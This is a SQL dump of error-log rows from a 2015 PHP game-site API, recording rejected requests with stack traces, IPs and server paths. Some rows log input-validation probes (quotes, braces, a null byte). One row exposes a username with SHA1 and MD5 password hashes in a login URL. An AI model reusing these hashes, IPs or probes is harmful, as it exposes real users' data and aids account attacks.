`system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (923, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /api.php?call=files&cat=sys&id=system.js&_=1431801397375', '4688b86cbbd29560c0d9954242843076ad67fd1f', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 107, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.016, '2015-05-16 20:36:31', 'mojotrollz.eu', 80, '/api.php?call=files&cat=sys&id=system.js&_=1431801397375', 'a:0:{}', 'http://mojotrollz.eu/?page=asdf&menu=fgdhg&', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 32, b'0', 0, 1, 1, 0, '2015-09-09 07:49:44'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (924, 'SYSTEM\\LOG\\ERROR', 'Call Command can only have letters! command: call; value: ', 'a2715f4a1633758a2e034264afd77aea92c5b4bb', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 196, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(49): SYSTEM\\API\\api::do_func_name(Array)\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.004, '2015-05-16 20:37:34', 'mojotrollz.eu', 80, '/api.php?call=', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 32, b'0', 0, 1, 1, 0, '2015-09-09 07:48:45'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (925, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: call_a', 'ff0c914570d75a643e0f5008989e64db5d72dd25', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 101, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'api_mojotrollz_...\', \'call_a\')\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.004, '2015-05-16 20:37:39', 'mojotrollz.eu', 80, '/api.php?call=a', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 32, b'0', 0, 1, 1, 0, '2015-09-09 07:48:36'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (926, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: call_abc', 'deebbf19c91a39d395da38e6fd8464b05f3d3db1', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 101, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'api_mojotrollz_...\', \'call_abc\')\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.004, '2015-05-16 20:37:48', 'mojotrollz.eu', 80, '/api.php?call=abc', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 32, b'0', 0, 1, 1, 0, '2015-09-09 07:48:49'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (927, 'SYSTEM\\LOG\\ERROR', 'Call Command can only have letters! command: call; value: abc"', 'f3ffa14a3986654144ac5478f425a53e57f7a092', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 196, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(49): SYSTEM\\API\\api::do_func_name(Array)\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.008, '2015-05-16 20:37:52', 'mojotrollz.eu', 80, '/api.php?call=abc%22', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 32, b'0', 0, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (928, 'SYSTEM\\LOG\\ERROR', 'Call Command can only have letters! command: call; value: abc}', 'ba48552478276f3e3e2e9ff6cfbecc84b0778782', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 196, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(49): SYSTEM\\API\\api::do_func_name(Array)\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.008, '2015-05-16 20:37:56', 'mojotrollz.eu', 80, '/api.php?call=abc}', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 32, b'0', 0, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (929, 'SYSTEM\\LOG\\ERROR', 'Call Command can only have letters! command: call; value: abc\0', '49a2b3b7dbf2dcc2fe5d43e55340dc36a437b9ad', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 196, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(49): SYSTEM\\API\\api::do_func_name(Array)\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.004, '2015-05-16 20:38:01', 'mojotrollz.eu', 80, '/api.php?call=abc%00', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 32, b'0', 0, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (930, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: call__', '5c4637968459b1eb5da8c56a53746bec4f16ec28', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 101, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'api_mojotrollz_...\', \'call__\')\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.008, '2015-05-16 20:40:53', 'mojotrollz.eu', 80, '/api.php?call=_', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 32, b'0', 0, 2, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (931, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: call__ b', '2b710555ba5cc0876018694fe195bb1e5ffeb50d', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 101, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'api_mojotrollz_...\', \'call__ b\')\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.008, '2015-05-16 20:40:57', 'mojotrollz.eu', 80, '/api.php?call=_%20b', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 32, b'0', 0, 1, 1, 0, '2015-09-09 07:48:55'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (932, 'SYSTEM\\LOG\\ERROR', 'Call Command can only have letters! command: action; value: ', '3679e567ea15ebe13120e03787c1901628c54800', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 196, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(49): SYSTEM\\API\\api::do_func_name(Array)\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.008, '2015-05-16 20:42:21', 'mojotrollz.eu', 80, '/api.php?call=account&action=', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 0, b'0', 0, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (933, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: call_account_action_j', '13f2b8bb66920f4d0bb768b5ee3c1ddf7e5a7476', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 101, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'api_mojotrollz_...\', \'call_account_ac...\')\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.008, '2015-05-16 20:42:35', 'mojotrollz.eu', 80, '/api.php?call=account&action=j', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 0, b'0', 0, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (934, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: call_account_action_0j', '95a6635e87668a047e8839e936ec439b7d93f456', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 101, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'api_mojotrollz_...\', \'call_account_ac...\')\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.008, '2015-05-16 20:42:41', 'mojotrollz.eu', 80, '/api.php?call=account&action=0j', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 0, b'0', 0, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (935, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: call_account_action_ j', '77d46cb233872634391ddf92bef9c6417d431f71', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 101, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'api_mojotrollz_...\', \'call_account_ac...\')\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.008, '2015-05-16 20:42:53', 'mojotrollz.eu', 80, '/api.php?call=account&action=%20j', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 0, b'0', 0, 2, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (936, 'SYSTEM\\LOG\\ERROR', 'Call Command can only have letters! command: action; value: j"', '32c9451ea1f21549a9b4a511e92722a1e45e4b90', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 196, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(49): SYSTEM\\API\\api::do_func_name(Array)\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.008, '2015-05-16 20:42:49', 'mojotrollz.eu', 80, '/api.php?call=account&action=%20j%22', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 0, b'0', 0, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (937, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: json Verifier: JSON', '1c19abe8cab01750d988830732f7a32c5d9ef5cd', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 183, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(43): SYSTEM\\API\\api::do_parameters_opt(Array, Array, 10, \'charcreation\', \'\\\\SYSTEM\\\\API\\\\ver...\')\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '199.19.94.16', 0.008, '2015-05-16 20:54:39', 'mojotrollz.eu', 80, '/api.php?call=charcreation&json={%22char_name%22%20:%20%22%22%22}', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 0, b'0', 0, 10, 1, 0, '2015-09-09 07:47:09'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (939, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 3; statics: 0; req_command: 1; req_param: 1; opt_param: 0; url: /web2/test/mojotrollz/api.php?call=pages&group=1&state=start', '8b210dd7dbf47254a25334b4af2c2a2519eb2d46', 1, '/home/web/web/test/mojotrollz/lib/system/api/api.php', 107, '#0 /home/web/web/test/mojotrollz/lib/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/web/test/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '37.24.146.231', 0.008, '2015-05-23 11:30:06', 'www.mojotrollz.eu', 80, '/web2/test/mojotrollz/api.php?call=pages&group=1&state=start', 'a:0:{}', 'http://www.mojotrollz.eu/web2/test/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36', 0, b'0', 0, 3, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (940, 'SYSTEM\\LOG\\ERROR', 'Parameter missing: state', '6dd4f8161a6b2296397a75a47fef4ba0f0104188', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 151, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 10, \'pages\', \'\\\\SYSTEM\\\\API\\\\ver...\')\n#1 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '37.24.146.231', 0.064, '2015-05-23 12:44:17', 'www.mojotrollz.eu', 80, '/api.php?call=pages&group=1', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36', 0, b'0', 0, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (941, 'SYSTEM\\LOG\\ERROR', 'Parameter missing: state', '6dd4f8161a6b2296397a75a47fef4ba0f0104188', 1, '/home/web/web/stable/mojotrollz/lib/system/api/api.php', 151, '#0 /home/web/web/stable/mojotrollz/lib/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 10, \'pages\', \'\\\\SYSTEM\\\\API\\\\ver...\')\n#1 /home/web/web/stable/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '66.249.64.20', 0.036, '2015-08-06 11:20:11', 'www.mojotrollz.eu', 80, '/api.php?call=pages&group=1', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, b'0', 0, 35, 1, 0, '2015-09-09 07:47:03'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (942, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'m.png"/\' found.', 'b3108160b08edfb95de7558eedb8c5a98f7cd7f1', 1, '/home/web/web/test/mojotrollz/lib/system/files/files.php', 22, '#0 /home/web/web/test/mojotrollz/lib/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'m.png"/\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'m.png"/\')\n#2 /home/web/web/test/mojotrollz/lib/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/web/test/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#4 {main}', '37.24.146.231', 0.048, '2015-05-28 16:42:45', 'www.mojotrollz.eu', 80, '/web2/test/mojotrollz/api.php?call=files&cat=wowicons&id=m.png%22/', 'a:0:{}', 'http://www.mojotrollz.eu/web2/test/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36', 0, b'0', 0, 5, 1, 0, '2015-09-09 07:47:18'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (943, 'SYSTEM\\LOG\\ERROR', 'No matching Cat \'img\' found.', 'e688116e7c6b6958a898e429e90dedcc7bd91bd9', 1, '/home/web/web/stable/mojotrollz/lib/system/files/files.php', 15, '#0 /home/web/web/stable/mojotrollz/lib/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'img\', \'head.jpg\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'img\', \'head.jpg\')\n#2 /home/web/web/stable/mojotrollz/lib/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/web/stable/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#4 {main}', '37.24.146.231', 0.052, '2015-09-11 22:31:07', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=img&id=head.jpg', 'a:0:{}', 'http://www.mojotrollz.eu/web2/test/mrechel/mrechel/page/default_page/css/default_page.css', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36', 0, b'0', 0, 404, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (944, 'SYSTEM\\LOG\\ERROR', 'No call given for the api', '4b24349672933d739f273edb30af772bfa68d391', 1, '/home/web/web/stable/mojotrollz/lib/system/api/api.php', 100, '#0 /home/web/web/stable/mojotrollz/lib/system/api/api.php(23): SYSTEM\\API\\api::do_default(false, \'api_mojotrollz_...\')\n#1 /home/web/web/stable/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '62.24.181.134', 0.056, '2015-08-26 07:42:36', 'www.mojotrollz.eu', 80, '/api.php', 'a:0:{}', 'http://www.mojotrollz.eu/api.php', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)', 0, b'0', 0, 7, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (945, 'SYSTEM\\LOG\\WARNING', 'Login Failed, User was not found in db', '53eb39cd76dff8495e11607350f395ec586de6f3', 1, '/home/web/web/stable/mojotrollz/lib/system/security/Security.php', 39, '#0 /home/web/web/stable/mojotrollz/lib/system/api/api_login.php(21): SYSTEM\\SECURITY\\Security::login(\'samsungsas sloo\', \'f804cfd00eb111e...\', \'e2a501d48cf88bf...\')\n#1 [internal function]: SYSTEM\\API\\api_login::call_account_action_login(\'samsungsas sloo\', \'f804cfd00eb111e...\', \'e2a501d48cf88bf...\')\n#2 /home/web/web/stable/mojotrollz/lib/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/web/stable/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#4 {main}', '213.143.70.161', 0.072, '2015-09-24 20:48:44', 'mojotrollz.eu', 80, '/api.php?call=account&action=login&username=samsungsas%20sloo&password_sha=f804cfd00eb111eb68ae1d6e5d5a26c0fdcfc82f&password_md5=e2a501d48cf88bfc102bd32225a63484', 'a:0:{}', 'http://mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36', 0, b'0', 0, 55, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (946, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /api.php?call=files&cat=sys&id=system.js&_=1433376000000', '13a6f9423c0c08f29873409681e0e588c1c6fa5e', 1, '/home/web/web/stable/mojotrollz/lib/system/api/api.php', 107, '#0 /home/web/web/stable/mojotrollz/lib/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/web/stable/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '66.249.73.226', 0.1, '2015-06-22 21:16:30', '85.10.198.18', 80, '/api.php?call=files&cat=sys&id=system.js&_=1433376000000', 'a:0:{}', 'http://85.10.198.18/index.php?p=server&sub=chars&page=10', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, b'0', 0, 2, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (947, 'SYSTEM\\LOG\\ERROR', 'No matching Cat \'content\' found.', '66dc880abdd8e467bcc6dbd2bbe405b893d68862', 1, '/home/web/web/stable/mojotrollz/lib/system/files/files.php', 15, '#0 /home/web/web/stable/mojotrollz/lib/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'content\', \'start1.jpg\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'content\', \'start1.jpg\')\n#2 /home/web/web/stable/mojotrollz/lib/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/web/stable/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#4 {main}', '95.222.208.29', 0.116, '2015-09-16 18:42:44', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=content&id=start1.jpg', 'a:0:{}', 'http://www.mojotrollz.eu/web/test/webcraft/webcraft/page/default_page/css/default_page.css', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36', 0, b'0', 0, 27, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (948, 'SYSTEM\\LOG\\ERROR', 'No matching ID 